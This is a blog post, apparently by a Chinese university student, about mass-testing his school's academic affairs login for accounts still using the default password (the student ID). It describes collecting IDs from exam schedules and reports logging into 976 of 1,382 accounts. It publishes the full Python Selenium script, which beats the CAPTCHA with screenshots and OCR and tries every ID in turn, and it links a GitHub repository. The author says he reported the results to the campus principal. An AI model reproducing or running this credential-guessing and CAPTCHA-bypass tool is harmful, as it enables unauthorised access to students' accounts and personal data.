因为很久以前看了一篇别人对教务系统进行信息检索的实例, 我也想查看一下我们校区的教务系统到底有多安全. 但是在实际写脚本时候, 却遇到了很多问题, 本篇博客也将是一篇技术总结.
一, 前期准备
思路是一个一个学号的去试是否使用了默认密码, 我了解到 16 级的教务系统默认密码是随机码, 18 级的教务系统默认密码是身份证后六位, 但偏偏只有我们 17 级的默认密码就是学号, 而且现在无法进行更改, 所以我只针对 17 级进行检索.
学号是从考试周的工作表得到的, 最开始想的是自己构造, 后来发现直接可以在专业群聊找到所有专业的考试安排表.
然后针对学号去重. 脚本如下
- import sys
- vis = {}
- def main():
- file_out = open("./data/xh.txt","w+")
- with open("./data/xuehao.txt","r") as file_in:
- for user in file_in.readlines():
- user = user.strip('\n')
- if user not in vis:
- vis[user] = 1
- print(user,file=file_out)
- file_out.close()
- if __name__ == "__main__":
- main()
- else:
- pass
然后就是开始针对教务系统的模拟登录脚本编写了.
二, 脚本编写以及运行
用 fiddler 扫了一篇网页后, 发现是 POST 传递参数
于是就想直接构造一个表单数据 POST 传递上去查看返回信息, 但是遇到了一个问题, 验证码, 开始我想直接把验证码通过 url 爬下来, 但是 F12 后发现, 验证码的地址是临时随机产生的, 如下图
找了很多方法, 还是没有解决这个随机验证码的问题. 后来借鉴了一种可行的方法, 利用 selenium 扩展库的 webdriver 直接模拟登录, 然后每次截图获取到验证码, 虽然效率比较低, 但却是一种可行方案.
解决方案如下, 利用截图获取验证码图片, 然后再利用 OCR 识别验证码, 识别出来可能有空格, 所以 replace 就好了.
其他部分就比较好写了, 通过 xpath 获得网页元素模块, 然后直接枚举即可.
三, 信息分析
运行结果如下
一共测试了 1382 个学号, 其中有 976 个都没有更改密码, 但是教务系统中包含了大量的个人信息.
这是我的教务系统的个人主页, 若是不法分子恶意爬取这些信息将可能造成一些不好的后果. 而且教务系统可以直接选课, 退课, 以及等等和学习有关的操作, 其安全问题不可小觑.
当然本次信息检索到此已经结束, 只是针对是否改密进行检索, 得到结果后我也马上整理发送给了校区赵校长.
四, 总结
照成这么多人没有改密的原因有一点是因为教务系统没法随时进行改密, 包括一些 18 级, 16 级的同学也说无法改密, 但是他们的密码相对而言比较安全, 但我们使用学号作为默认密码实在是过于简单.
经过几次思考之后, 还是决定把代码整理并放出来, 仅供参考学习.
编写脚本遇到的一些问题大多都是环境没有配置好的问题, 也都得到解决.
脚本代码如下:
- import time
- import pytesseract
- from PIL import Image, ImageEnhance
- from selenium import webdriver
- from selenium.webdriver.common.by import By
- url = ""
- def work(user_data,pass_data):
- # 1, 打开浏览器, 最大化浏览器
- driver = webdriver.Firefox()
- driver.get(url)
- driver.implicitly_wait(40)
- driver.maximize_window()
- userElement = driver.find_element(By.XPATH, "/html/body/table/tbody/tr/td/table[3]/tbody/tr/td[2]/form/table/tbody/tr[2]/td/table/tbody/tr[1]/td[2]/input")
- passElement = driver.find_element(By.XPATH, "/html/body/table/tbody/tr/td/table[3]/tbody/tr/td[2]/form/table/tbody/tr[2]/td/table/tbody/tr[2]/td[2]/input")
- codeElement = driver.find_element(By.XPATH, "/html/body/table/tbody/tr/td/table[3]/tbody/tr/td[2]/form/table/tbody/tr[2]/td/table/tbody/tr[3]/td[2]/input")
- # 2, 截取屏幕内容, 保存到本地
- driver.save_screenshot("./test/01.png")
- # 3, 打开截图, 获取验证码位置, 截取保存验证码
- ran = Image.open("./test/01.png")
- box = (829, 495, 928, 519) # 获取验证码位置, 代表 (左, 上, 右, 下)
- ran.crop(box).save("./test/02.png")
- # 4, 获取验证码图片, 读取验证码
- imageCode = Image.open("./test/02.png")
- code = pytesseract.image_to_string(imageCode).strip().replace("","")
- # 5, 收到验证码, 进行输入验证
- userElement.send_keys(user_data)
- passElement.send_keys(pass_data)
- codeElement.send_keys(code)
- click_login = driver.find_element(By.XPATH, "//*[@id=\"btnSure\"]")
- click_login.click()
- time.sleep(0.01)
- try:
- title_data = driver.title
- if title_data.find('个人管理') != -1:
- print(user_data,'success')
- driver.close()
- return 0
- else:
- error_data = driver.find_element(By.XPATH, "/html/body/table/tbody/tr/td/table[3]/tbody/tr/td[2]/form/table/tbody/tr[1]/td/table/tbody/tr/td/table/tbody/tr[2]/td[2]/strong/font").text
- if error_data.find('验证码错误') != -1:
- driver.close()
- return 1
- elif error_data.find('密码不正确') != -1:
- print(user_data,'wrong')
- driver.close()
- return 2
- elif error_data.find('证件号') != -1:
- driver.close()
- return 3
- except Exception:
- print(user_data,'abnormal')
- driver.close()
- return 1
- def main():
- i = 1
- sum = 0
- ans = '' file_out = open("./data/result.txt",'w+')
- with open("./data/xh.txt",'r') as file_in:
- for user in file_in.readlines():
- user = user.strip('\n')
- password = user
- print(i,end = ' ')
- i += 1
- ret = work(user,password)
- while ret == 1:
- ret = work(user,password)
- if ret == 0:
- sum += 1
- ans = 'correct'
- elif ret == 2:
- ans = 'wrong'
- elif ret == 3:
- ans = 'Number is wrong'
- print(user,ans,file=file_out)
- print('Use the default password persons:',sum,file=file_out)
- file_out.close()
- if __name__ == "__main__":
- main()
- else:
- pass
- View Code
或者可以访问 GitHub 获取: https://github.com/X3NNY/URPscript
希望大家不要用来非法获取信息
来源: https://www.cnblogs.com/xenny/p/10275352.html